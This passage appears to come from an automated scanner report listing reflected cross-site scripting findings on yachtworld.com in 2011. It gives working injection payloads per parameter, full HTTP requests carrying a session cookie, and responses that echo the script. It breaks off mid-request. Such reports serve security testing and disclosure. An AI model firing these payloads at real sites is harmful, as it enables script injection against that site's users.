3.528. https://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Issue detail

The value of the send_to request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887c1"><script>alert(1)</script>533f035028b was submitted in the send_to parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/globalnav/emailForm.jsp?send_to=tech887c1"><script>alert(1)</script>533f035028b&refer_page=/core/globalnav/contactUs.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:34 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="send_to" value="tech887c1"><script>alert(1)</script>533f035028b">
...[SNIP]...

3.529. https://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f21"style%3d"x%3aexpression(alert(1))"aae8494ed66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4f21"style="x:expression(alert(1))"aae8494ed66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/advancedSearch.jsp?b4f21"style%3d"x%3aexpression(alert(1))"aae8494ed66=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?N=2286&b4f21"style="x:expression(alert(1))"aae8494ed66" >
...[SNIP]...

3.530. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the N request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 143dc'%3balert(1)//7878f029867 was submitted in the N parameter. This input was echoed as 143dc';alert(1)//7878f029867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2280143dc'%3balert(1)//7878f029867&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:59:05 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2280143dc';alert(1)//7878f029867"<br>
...[SNIP]...

3.531. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the enid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4a1f"%3balert(1)//5a06d383abd was submitted in the enid parameter. This input was echoed as d4a1f";alert(1)//5a06d383abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0&enid=0d4a1f"%3balert(1)//5a06d383abd&currencyid=100&luom=126&N=2280&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:53 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
se entered"
s.prop8="no search phrase entered"
s.prop9="no search phrase entered"
s.prop10="no search phrase entered"
s.prop11="no search phrase entered"
s.prop12="no search phrase entered"
s.prop13="0d4a1f";alert(1)//5a06d383abd"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="no search phrase entered"
s.prop18="no search phrase entered"
s.prop19="zero"
s.p
...[SNIP]...

3.532. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the ftid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e9f"%3balert(1)//caf0417ccb5 was submitted in the ftid parameter. This input was echoed as c3e9f";alert(1)//caf0417ccb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=0&ftid=0c3e9f"%3balert(1)//caf0417ccb5&enid=0&currencyid=100&luom=126&N=2280&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 